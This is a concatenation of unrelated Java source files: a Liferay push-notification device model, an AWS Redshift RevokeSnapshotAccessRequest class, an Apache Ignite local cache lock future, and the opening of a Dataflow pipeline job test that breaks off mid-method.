public void setCreateDate(Date createDate) {
_createDate = createDate;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setCreateDate", Date.class);
method.invoke(_pushNotificationsDeviceRemoteModel, createDate);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getPlatform() {
return _platform;
}
@Override
public void setPlatform(String platform) {
_platform = platform;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setPlatform", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, platform);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getToken() {
return _token;
}
@Override
public void setToken(String token) {
_token = token;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setToken", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, token);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getModel() {
return _model;
}
@Override
public void setModel(String model) {
_model = model;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setModel", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, model);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getOSVersion() {
return _OSVersion;
}
@Override
public void setOSVersion(String OSVersion) {
_OSVersion = OSVersion;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setOSVersion", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, OSVersion);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public long getAppId() {
return _appId;
}
@Override
public void setAppId(long appId) {
_appId = appId;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setAppId", long.class);
method.invoke(_pushNotificationsDeviceRemoteModel, appId);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getAppVersion() {
return _appVersion;
}
@Override
public void setAppVersion(String appVersion) {
_appVersion = appVersion;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setAppVersion", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, appVersion);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
public BaseModel<?> getPushNotificationsDeviceRemoteModel() {
return _pushNotificationsDeviceRemoteModel;
}
public void setPushNotificationsDeviceRemoteModel(
BaseModel<?> pushNotificationsDeviceRemoteModel) {
_pushNotificationsDeviceRemoteModel = pushNotificationsDeviceRemoteModel;
}
public Object invokeOnRemoteModel(String methodName,
Class<?>[] parameterTypes, Object[] parameterValues)
throws Exception {
Object[] remoteParameterValues = new Object[parameterValues.length];
for (int i = 0; i < parameterValues.length; i++) {
if (parameterValues[i] != null) {
remoteParameterValues[i] = ClpSerializer.translateInput(parameterValues[i]);
}
}
Class<?> remoteModelClass = _pushNotificationsDeviceRemoteModel.getClass();
ClassLoader remoteModelClassLoader = remoteModelClass.getClassLoader();
Class<?>[] remoteParameterTypes = new Class[parameterTypes.length];
for (int i = 0; i < parameterTypes.length; i++) {
if (parameterTypes[i].isPrimitive()) {
remoteParameterTypes[i] = parameterTypes[i];
} else {
String parameterTypeName = parameterTypes[i].getName();
remoteParameterTypes[i] = remoteModelClassLoader.loadClass(parameterTypeName);
}
}
Method method = remoteModelClass.getMethod(methodName,
remoteParameterTypes);
Object returnValue = method.invoke(_pushNotificationsDeviceRemoteModel,
remoteParameterValues);
if (returnValue != null) {
returnValue = ClpSerializer.translateOutput(returnValue);
}
return returnValue;
}
@Override
public void persist() throws SystemException {
if (this.isNew()) {
PushNotificationsDeviceLocalServiceUtil.addPushNotificationsDevice(this);
} else {
PushNotificationsDeviceLocalServiceUtil.updatePushNotificationsDevice(this);
}
}
@Override
public PushNotificationsDevice toEscapedModel() {
return (PushNotificationsDevice) ProxyUtil.newProxyInstance(PushNotificationsDevice.class.getClassLoader(),
new Class[] { PushNotificationsDevice.class },
new AutoEscapeBeanHandler(this));
}
@Override
public Object clone() {
PushNotificationsDeviceClp clone = new PushNotificationsDeviceClp();
clone.setPushNotificationsDeviceId(getPushNotificationsDeviceId());
clone.setUserId(getUserId());
clone.setCreateDate(getCreateDate());
clone.setPlatform(getPlatform());
clone.setToken(getToken());
clone.setModel(getModel());
clone.setOSVersion(getOSVersion());
clone.setAppId(getAppId());
clone.setAppVersion(getAppVersion());
return clone;
}
@Override
public int compareTo(PushNotificationsDevice pushNotificationsDevice) {
long primaryKey = pushNotificationsDevice.getPrimaryKey();
if (getPrimaryKey() < primaryKey) {
return -1;
} else if (getPrimaryKey() > primaryKey) {
return 1;
} else {
return 0;
}
}
@Override
public boolean equals(Object obj) {
if (this == obj) {
return true;
}
if (!(obj instanceof PushNotificationsDeviceClp)) {
return false;
}
PushNotificationsDeviceClp pushNotificationsDevice = (PushNotificationsDeviceClp) obj;
long primaryKey = pushNotificationsDevice.getPrimaryKey();
if (getPrimaryKey() == primaryKey) {
return true;
} else {
return false;
}
}
public Class<?> getClpSerializerClass() {
return _clpSerializerClass;
}
@Override
public int hashCode() {
return (int) getPrimaryKey();
}
@Override
public String toString() {
StringBundler sb = new StringBundler(19);
sb.append("{pushNotificationsDeviceId=");
sb.append(getPushNotificationsDeviceId());
sb.append(", userId=");
sb.append(getUserId());
sb.append(", createDate=");
sb.append(getCreateDate());
sb.append(", platform=");
sb.append(getPlatform());
sb.append(", token=");
sb.append(getToken());
sb.append(", model=");
sb.append(getModel());
sb.append(", OSVersion=");
sb.append(getOSVersion());
sb.append(", appId=");
sb.append(getAppId());
sb.append(", appVersion=");
sb.append(getAppVersion());
sb.append("}");
return sb.toString();
}
@Override
public String toXmlString() {
StringBundler sb = new StringBundler(31);
sb.append("<model><model-name>");
sb.append("com.liferay.pushnotifications.model.PushNotificationsDevice");
sb.append("</model-name>");
sb.append(
"<column><column-name>pushNotificationsDeviceId</column-name><column-value><![CDATA[");
sb.append(getPushNotificationsDeviceId());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>userId</column-name><column-value><![CDATA[");
sb.append(getUserId());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>createDate</column-name><column-value><![CDATA[");
sb.append(getCreateDate());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>platform</column-name><column-value><![CDATA[");
sb.append(getPlatform());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>token</column-name><column-value><![CDATA[");
sb.append(getToken());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>model</column-name><column-value><![CDATA[");
sb.append(getModel());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>OSVersion</column-name><column-value><![CDATA[");
sb.append(getOSVersion());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>appId</column-name><column-value><![CDATA[");
sb.append(getAppId());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>appVersion</column-name><column-value><![CDATA[");
sb.append(getAppVersion());
sb.append("]]></column-value></column>");
sb.append("</model>");
return sb.toString();
}
}
|
|
/*
* Copyright 2010-2016 Amazon.com, Inc. or its affiliates. All Rights
* Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package com.amazonaws.services.redshift.model;
import java.io.Serializable;
import com.amazonaws.AmazonWebServiceRequest;
/**
* <p>
* </p>
*/
public class RevokeSnapshotAccessRequest extends AmazonWebServiceRequest
implements Serializable, Cloneable {
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*/
private String snapshotIdentifier;
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*/
private String snapshotClusterIdentifier;
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*/
private String accountWithRestoreAccess;
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*
* @param snapshotIdentifier
* The identifier of the snapshot that the account can no longer
* access.
*/
public void setSnapshotIdentifier(String snapshotIdentifier) {
this.snapshotIdentifier = snapshotIdentifier;
}
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*
* @return The identifier of the snapshot that the account can no longer
* access.
*/
public String getSnapshotIdentifier() {
return this.snapshotIdentifier;
}
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*
* @param snapshotIdentifier
* The identifier of the snapshot that the account can no longer
* access.
* @return Returns a reference to this object so that method calls can be
* chained together.
*/
public RevokeSnapshotAccessRequest withSnapshotIdentifier(
String snapshotIdentifier) {
setSnapshotIdentifier(snapshotIdentifier);
return this;
}
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*
* @param snapshotClusterIdentifier
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a
* snapshot resource element that specifies anything other than * for
* the cluster name.
*/
public void setSnapshotClusterIdentifier(String snapshotClusterIdentifier) {
this.snapshotClusterIdentifier = snapshotClusterIdentifier;
}
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*
* @return The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a
* snapshot resource element that specifies anything other than *
* for the cluster name.
*/
public String getSnapshotClusterIdentifier() {
return this.snapshotClusterIdentifier;
}
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*
* @param snapshotClusterIdentifier
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a
* snapshot resource element that specifies anything other than * for
* the cluster name.
* @return Returns a reference to this object so that method calls can be
* chained together.
*/
public RevokeSnapshotAccessRequest withSnapshotClusterIdentifier(
String snapshotClusterIdentifier) {
setSnapshotClusterIdentifier(snapshotClusterIdentifier);
return this;
}
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*
* @param accountWithRestoreAccess
* The identifier of the AWS customer account that can no longer
* restore the specified snapshot.
*/
public void setAccountWithRestoreAccess(String accountWithRestoreAccess) {
this.accountWithRestoreAccess = accountWithRestoreAccess;
}
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*
* @return The identifier of the AWS customer account that can no longer
* restore the specified snapshot.
*/
public String getAccountWithRestoreAccess() {
return this.accountWithRestoreAccess;
}
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*
* @param accountWithRestoreAccess
* The identifier of the AWS customer account that can no longer
* restore the specified snapshot.
* @return Returns a reference to this object so that method calls can be
* chained together.
*/
public RevokeSnapshotAccessRequest withAccountWithRestoreAccess(
String accountWithRestoreAccess) {
setAccountWithRestoreAccess(accountWithRestoreAccess);
return this;
}
/**
* Returns a string representation of this object; useful for testing and
* debugging.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getSnapshotIdentifier() != null)
sb.append("SnapshotIdentifier: " + getSnapshotIdentifier() + ",");
if (getSnapshotClusterIdentifier() != null)
sb.append("SnapshotClusterIdentifier: "
+ getSnapshotClusterIdentifier() + ",");
if (getAccountWithRestoreAccess() != null)
sb.append("AccountWithRestoreAccess: "
+ getAccountWithRestoreAccess());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof RevokeSnapshotAccessRequest == false)
return false;
RevokeSnapshotAccessRequest other = (RevokeSnapshotAccessRequest) obj;
if (other.getSnapshotIdentifier() == null
^ this.getSnapshotIdentifier() == null)
return false;
if (other.getSnapshotIdentifier() != null
&& other.getSnapshotIdentifier().equals(
this.getSnapshotIdentifier()) == false)
return false;
if (other.getSnapshotClusterIdentifier() == null
^ this.getSnapshotClusterIdentifier() == null)
return false;
if (other.getSnapshotClusterIdentifier() != null
&& other.getSnapshotClusterIdentifier().equals(
this.getSnapshotClusterIdentifier()) == false)
return false;
if (other.getAccountWithRestoreAccess() == null
^ this.getAccountWithRestoreAccess() == null)
return false;
if (other.getAccountWithRestoreAccess() != null
&& other.getAccountWithRestoreAccess().equals(
this.getAccountWithRestoreAccess()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime
* hashCode
+ ((getSnapshotIdentifier() == null) ? 0
: getSnapshotIdentifier().hashCode());
hashCode = prime
* hashCode
+ ((getSnapshotClusterIdentifier() == null) ? 0
: getSnapshotClusterIdentifier().hashCode());
hashCode = prime
* hashCode
+ ((getAccountWithRestoreAccess() == null) ? 0
: getAccountWithRestoreAccess().hashCode());
return hashCode;
}
@Override
public RevokeSnapshotAccessRequest clone() {
return (RevokeSnapshotAccessRequest) super.clone();
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.ignite.internal.processors.cache.local;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.UUID;
import java.util.concurrent.atomic.AtomicReference;
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;
import org.apache.ignite.IgniteCheckedException;
import org.apache.ignite.IgniteLogger;
import org.apache.ignite.internal.IgniteInternalFuture;
import org.apache.ignite.internal.processors.cache.CacheEntryPredicate;
import org.apache.ignite.internal.processors.cache.GridCacheContext;
import org.apache.ignite.internal.processors.cache.GridCacheEntryEx;
import org.apache.ignite.internal.processors.cache.GridCacheEntryRemovedException;
import org.apache.ignite.internal.processors.cache.GridCacheFutureAdapter;
import org.apache.ignite.internal.processors.cache.GridCacheMvccCandidate;
import org.apache.ignite.internal.processors.cache.GridCacheVersionedFuture;
import org.apache.ignite.internal.processors.cache.KeyCacheObject;
import org.apache.ignite.internal.processors.cache.transactions.IgniteTxKey;
import org.apache.ignite.internal.processors.cache.transactions.IgniteTxLocalEx;
import org.apache.ignite.internal.processors.cache.transactions.TxDeadlock;
import org.apache.ignite.internal.processors.cache.version.GridCacheVersion;
import org.apache.ignite.internal.processors.timeout.GridTimeoutObjectAdapter;
import org.apache.ignite.internal.transactions.IgniteTxTimeoutCheckedException;
import org.apache.ignite.internal.util.tostring.GridToStringExclude;
import org.apache.ignite.internal.util.tostring.GridToStringInclude;
import org.apache.ignite.internal.util.typedef.F;
import org.apache.ignite.internal.util.typedef.internal.S;
import org.apache.ignite.internal.util.typedef.internal.U;
import org.apache.ignite.lang.IgniteInClosure;
import org.apache.ignite.lang.IgniteUuid;
import org.apache.ignite.transactions.TransactionDeadlockException;
import org.jetbrains.annotations.Nullable;
/**
* Cache lock future.
*/
public final class GridLocalLockFuture<K, V> extends GridCacheFutureAdapter<Boolean>
implements GridCacheVersionedFuture<Boolean> {
/** Logger reference. */
private static final AtomicReference<IgniteLogger> logRef = new AtomicReference<>();
/** Error updater. */
private static final AtomicReferenceFieldUpdater<GridLocalLockFuture, Throwable> ERR_UPD =
AtomicReferenceFieldUpdater.newUpdater(GridLocalLockFuture.class, Throwable.class, "err");
/** Logger. */
private static IgniteLogger log;
/** Cache registry. */
@GridToStringExclude
private GridCacheContext<K, V> cctx;
/** Underlying cache. */
@GridToStringExclude
private GridLocalCache<K, V> cache;
/** Lock owner thread. */
@GridToStringInclude
private long threadId;
/**
* Keys locked so far.
*
* Thread created this object iterates over entries and tries to lock each of them.
* If it finds some entry already locked by another thread it registers callback which will be executed
* by the thread owning the lock.
*
* Thus access to this collection must be synchronized except cases
* when this object is yet local to the thread created it.
*/
@GridToStringExclude
private List<GridLocalCacheEntry> entries;
/** Future ID. */
private IgniteUuid futId;
/** Lock version. */
private GridCacheVersion lockVer;
/** Error. */
@SuppressWarnings("UnusedDeclaration")
private volatile Throwable err;
/** Timeout object. */
@GridToStringExclude
private LockTimeoutObject timeoutObj;
/** Lock timeout. */
private final long timeout;
/** Filter. */
private CacheEntryPredicate[] filter;
/** Transaction. */
private IgniteTxLocalEx tx;
/** Trackable flag. */
private boolean trackable = true;
/**
* @param cctx Registry.
* @param keys Keys to lock.
* @param tx Transaction.
* @param cache Underlying cache.
* @param timeout Lock acquisition timeout.
* @param filter Filter.
*/
GridLocalLockFuture(
GridCacheContext<K, V> cctx,
Collection<KeyCacheObject> keys,
IgniteTxLocalEx tx,
GridLocalCache<K, V> cache,
long timeout,
CacheEntryPredicate[] filter) {
assert keys != null;
assert cache != null;
assert (tx != null && timeout >= 0) || tx == null;
this.cctx = cctx;
this.cache = cache;
this.timeout = timeout;
this.filter = filter;
this.tx = tx;
ignoreInterrupts();
threadId = tx == null ? Thread.currentThread().getId() : tx.threadId();
lockVer = tx != null ? tx.xidVersion() : cctx.versions().next();
futId = IgniteUuid.randomUuid();
entries = new ArrayList<>(keys.size());
if (log == null)
log = U.logger(cctx.kernalContext(), logRef, GridLocalLockFuture.class);
}
/**
* @param keys Keys.
* @return {@code False} in case of error.
* @throws IgniteCheckedException If failed.
*/
public boolean addEntries(Collection<KeyCacheObject> keys) throws IgniteCheckedException {
for (KeyCacheObject key : keys) {
while (true) {
GridLocalCacheEntry entry = null;
try {
entry = cache.entryExx(key);
entry.unswap(false);
if (!cctx.isAll(entry, filter)) {
onFailed();
return false;
}
// Removed exception may be thrown here.
GridCacheMvccCandidate cand = addEntry(entry);
if (cand == null && isDone())
return false;
break;
}
catch (GridCacheEntryRemovedException ignored) {
if (log.isDebugEnabled())
log.debug("Got removed entry in lockAsync(..) method (will retry): " + entry);
}
}
}
if (timeout > 0) {
timeoutObj = new LockTimeoutObject();
cctx.time().addTimeoutObject(timeoutObj);
}
return true;
}
/** {@inheritDoc} */
@Override public IgniteUuid futureId() {
return futId;
}
/** {@inheritDoc} */
@Override public GridCacheVersion version() {
return lockVer;
}
/** {@inheritDoc} */
@Override public boolean onNodeLeft(UUID nodeId) {
return false;
}
/** {@inheritDoc} */
@Override public boolean trackable() {
return trackable;
}
/** {@inheritDoc} */
@Override public void markNotTrackable() {
trackable = false;
}
/**
* @return Entries.
*/
private List<GridLocalCacheEntry> entries() {
return entries;
}
/**
* @return {@code True} if transaction is not {@code null}.
*/
private boolean inTx() {
return tx != null;
}
/**
* @return {@code True} if implicit transaction.
*/
private boolean implicitSingle() {
return tx != null && tx.implicitSingle();
}
/**
* @param cached Entry.
* @return {@code True} if locked.
* @throws GridCacheEntryRemovedException If removed.
*/
private boolean locked(GridCacheEntryEx cached) throws GridCacheEntryRemovedException {
// Reentry-aware check.
return (cached.lockedLocally(lockVer) || (cached.lockedByThread(threadId))) &&
filter(cached); // If filter failed, lock is failed.
}
/**
* Adds entry to future.
*
* @param entry Entry to add.
* @return Lock candidate.
* @throws GridCacheEntryRemovedException If entry was removed.
*/
private @Nullable GridCacheMvccCandidate addEntry(GridLocalCacheEntry entry)
throws GridCacheEntryRemovedException {
// Add local lock first, as it may throw GridCacheEntryRemovedException.
GridCacheMvccCandidate c = entry.addLocal(
threadId,
lockVer,
null,
null,
timeout,
!inTx(),
inTx(),
implicitSingle(),
false
);
entries.add(entry);
if (c == null && timeout < 0) {
if (log.isDebugEnabled())
log.debug("Failed to acquire lock with negative timeout: " + entry);
onFailed();
return null;
}
if (c != null) {
// Immediately set lock to ready.
entry.readyLocal(c);
}
return c;
}
/**
* Undoes all locks.
*/
private void undoLocks() {
Collection<GridLocalCacheEntry> entriesCp = entriesCopy();
for (GridLocalCacheEntry e : entriesCp) {
try {
e.removeLock(lockVer);
}
catch (GridCacheEntryRemovedException ignore) {
if (log.isDebugEnabled())
log.debug("Got removed entry while undoing locks: " + e);
}
}
}
/**
* Need of synchronization here is explained in the field's {@link GridLocalLockFuture#entries} comment.
*
* @return Copy of entries collection.
*/
private synchronized Collection<GridLocalCacheEntry> entriesCopy() {
return new ArrayList<>(entries());
}
/**
*
*/
void onFailed() {
undoLocks();
onComplete(false);
}
/**
* @param t Error.
*/
void onError(Throwable t) {
if (ERR_UPD.compareAndSet(this, null, t))
onFailed();
}
/**
* @param cached Entry to check.
* @return {@code True} if filter passed.
*/
private boolean filter(GridCacheEntryEx cached) {
try {
if (!cctx.isAll(cached, filter)) {
if (log.isDebugEnabled())
log.debug("Filter didn't pass for entry (will fail lock): " + cached);
onFailed();
return false;
}
return true;
}
catch (IgniteCheckedException e) {
onError(e);
return false;
}
}
/**
* Explicitly check if lock was acquired.
*/
void checkLocks() {
if (!isDone()) {
for (int i = 0; i < entries.size(); i++) {
while (true) {
GridCacheEntryEx cached = entries.get(i);
try {
if (!locked(cached))
return;
break;
}
// Possible in concurrent cases, when owner is changed after locks
// have been released or cancelled.
catch (GridCacheEntryRemovedException ignore) {
if (log.isDebugEnabled())
log.debug("Got removed entry in onOwnerChanged method (will retry): " + cached);
// Replace old entry with new one.
entries.add(i, (GridLocalCacheEntry)cache.entryEx(cached.key()));
}
}
}
if (log.isDebugEnabled())
log.debug("Local lock acquired for entries: " + entries);
onComplete(true);
}
}
/** {@inheritDoc} */
@Override public boolean onOwnerChanged(GridCacheEntryEx entry, GridCacheMvccCandidate owner) {
if (!isDone()) {
for (int i = 0; i < entries.size(); i++) {
while (true) {
GridCacheEntryEx cached = entries.get(i);
try {
if (!locked(cached))
return true;
break;
}
// Possible in concurrent cases, when owner is changed after locks
// have been released or cancelled.
catch (GridCacheEntryRemovedException ignore) {
if (log.isDebugEnabled())
log.debug("Got removed entry in onOwnerChanged method (will retry): " + cached);
// Replace old entry with new one.
entries.add(i, (GridLocalCacheEntry)cache.entryEx(cached.key()));
}
}
}
if (log.isDebugEnabled())
log.debug("Local lock acquired for entries: " + entries);
onComplete(true);
}
return false;
}
/** {@inheritDoc} */
@SuppressWarnings({"ThrowableInstanceNeverThrown"})
@Override public boolean cancel() {
if (onCancelled()) {
// Remove all locks.
undoLocks();
onComplete(false);
}
return isCancelled();
}
/**
* Completeness callback.
*
* @param success If {@code true}, then lock has been acquired.
*/
private void onComplete(boolean success) {
if (!success)
undoLocks();
if (onDone(success, err)) {
if (log.isDebugEnabled())
log.debug("Completing future: " + this);
cache.onFutureDone(this);
if (timeoutObj != null)
cctx.time().removeTimeoutObject(timeoutObj);
}
}
/** {@inheritDoc} */
@Override public String toString() {
return S.toString(GridLocalLockFuture.class, this);
}
/**
* Lock request timeout object.
*/
private class LockTimeoutObject extends GridTimeoutObjectAdapter {
/**
* Default constructor.
*/
LockTimeoutObject() {
super(timeout);
}
/** {@inheritDoc} */
@SuppressWarnings({"ThrowableInstanceNeverThrown", "ForLoopReplaceableByForEach"})
@Override public void onTimeout() {
if (log.isDebugEnabled())
log.debug("Timed out waiting for lock response: " + this);
if (inTx() && cctx.tm().deadlockDetectionEnabled()) {
Set<IgniteTxKey> keys = new HashSet<>();
List<GridLocalCacheEntry> entries = entries();
for (int i = 0; i < entries.size(); i++) {
GridLocalCacheEntry e = entries.get(i);
List<GridCacheMvccCandidate> mvcc = e.mvccAllLocal();
if (mvcc == null)
continue;
GridCacheMvccCandidate cand = mvcc.get(0);
if (cand.owner() && cand.tx() && !cand.version().equals(tx.xidVersion()))
keys.add(e.txKey());
}
IgniteInternalFuture<TxDeadlock> fut = cctx.tm().detectDeadlock(tx, keys);
fut.listen(new IgniteInClosure<IgniteInternalFuture<TxDeadlock>>() {
@Override public void apply(IgniteInternalFuture<TxDeadlock> fut) {
try {
TxDeadlock deadlock = fut.get();
if (deadlock != null)
ERR_UPD.compareAndSet(GridLocalLockFuture.this, null,
new IgniteTxTimeoutCheckedException("Failed to acquire lock within provided timeout for " +
"transaction [timeout=" + tx.timeout() + ", tx=" + tx + ']',
new TransactionDeadlockException(deadlock.toString(cctx.shared()))));
}
catch (IgniteCheckedException e) {
U.warn(log, "Failed to detect deadlock.", e);
ERR_UPD.compareAndSet(GridLocalLockFuture.this, null, e);
}
onComplete(false);
}
});
}
else
onComplete(false);
}
/** {@inheritDoc} */
@Override public String toString() {
return S.toString(LockTimeoutObject.class, this);
}
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.cloud.dataflow.sdk.runners;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.allOf;
import static org.hamcrest.Matchers.contains;
import static org.hamcrest.Matchers.containsInAnyOrder;
import static org.hamcrest.Matchers.empty;
import static org.hamcrest.Matchers.equalTo;
import static org.hamcrest.Matchers.greaterThanOrEqualTo;
import static org.hamcrest.Matchers.hasEntry;
import static org.hamcrest.Matchers.is;
import static org.hamcrest.Matchers.lessThanOrEqualTo;
import static org.junit.Assert.assertEquals;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
import com.google.api.services.dataflow.Dataflow;
import com.google.api.services.dataflow.Dataflow.Projects.Jobs.Get;
import com.google.api.services.dataflow.Dataflow.Projects.Jobs.GetMetrics;
import com.google.api.services.dataflow.Dataflow.Projects.Jobs.Messages;
import com.google.api.services.dataflow.model.Job;
import com.google.api.services.dataflow.model.JobMetrics;
import com.google.api.services.dataflow.model.MetricStructuredName;
import com.google.api.services.dataflow.model.MetricUpdate;
import com.google.cloud.dataflow.sdk.PipelineResult.State;
import com.google.cloud.dataflow.sdk.runners.dataflow.DataflowAggregatorTransforms;
import com.google.cloud.dataflow.sdk.testing.FastNanoClockAndSleeper;
import com.google.cloud.dataflow.sdk.transforms.Aggregator;
import com.google.cloud.dataflow.sdk.transforms.AppliedPTransform;
import com.google.cloud.dataflow.sdk.transforms.Combine.CombineFn;
import com.google.cloud.dataflow.sdk.transforms.PTransform;
import com.google.cloud.dataflow.sdk.transforms.Sum;
import com.google.cloud.dataflow.sdk.util.AttemptBoundedExponentialBackOff;
import com.google.cloud.dataflow.sdk.util.MonitoringUtil;
import com.google.cloud.dataflow.sdk.values.PInput;
import com.google.cloud.dataflow.sdk.values.POutput;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSetMultimap;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import org.junit.runner.RunWith;
import org.junit.runners.JUnit4;
import org.mockito.Mock;
import org.mockito.MockitoAnnotations;
import java.io.IOException;
import java.math.BigDecimal;
import java.net.SocketTimeoutException;
import java.util.concurrent.TimeUnit;
/**
* Tests for DataflowPipelineJob.
*/
@RunWith(JUnit4.class)
public class DataflowPipelineJobTest {
private static final String PROJECT_ID = "someProject";
private static final String JOB_ID = "1234";
@Mock
private Dataflow mockWorkflowClient;
@Mock
private Dataflow.Projects mockProjects;
@Mock
private Dataflow.Projects.Jobs mockJobs;
@Rule
public FastNanoClockAndSleeper fastClock = new FastNanoClockAndSleeper();
@Rule
public ExpectedException thrown = ExpectedException.none();
@Before
public void setup() {
MockitoAnnotations.initMocks(this);
when(mockWorkflowClient.projects()).thenReturn(mockProjects);
when(mockProjects.jobs()).thenReturn(mockJobs);
}
/**
* Validates that a given time is valid for the total time slept by a
* AttemptBoundedExponentialBackOff given the number of retries and
* an initial polling interval.
*
* @param pollingIntervalMillis The initial polling interval given.
* @param attempts The number of attempts made
* @param timeSleptMillis The amount of time slept by the clock. This is checked
* against the valid interval.
*/
void checkValidInterval(long pollingIntervalMillis, int attempts, long timeSleptMillis) {
long highSum = 0;
long lowSum = 0;
for (int i = 1; i < attempts; i++) {
double currentInterval =
pollingIntervalMillis
* Math.pow(AttemptBoundedExponentialBackOff.DEFAULT_MULTIPLIER, i - 1);
double offset =
AttemptBoundedExponentialBackOff.DEFAULT_RANDOMIZATION_FACTOR * currentInterval;
highSum += Math.round(currentInterval + offset);
lowSum += Math.round(currentInterval - offset);
}
assertThat(timeSleptMillis, allOf(greaterThanOrEqualTo(lowSum), lessThanOrEqualTo(highSum)));
}
@Test
public void testWaitToFinishMessagesFail() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
Job statusResponse = new Job();
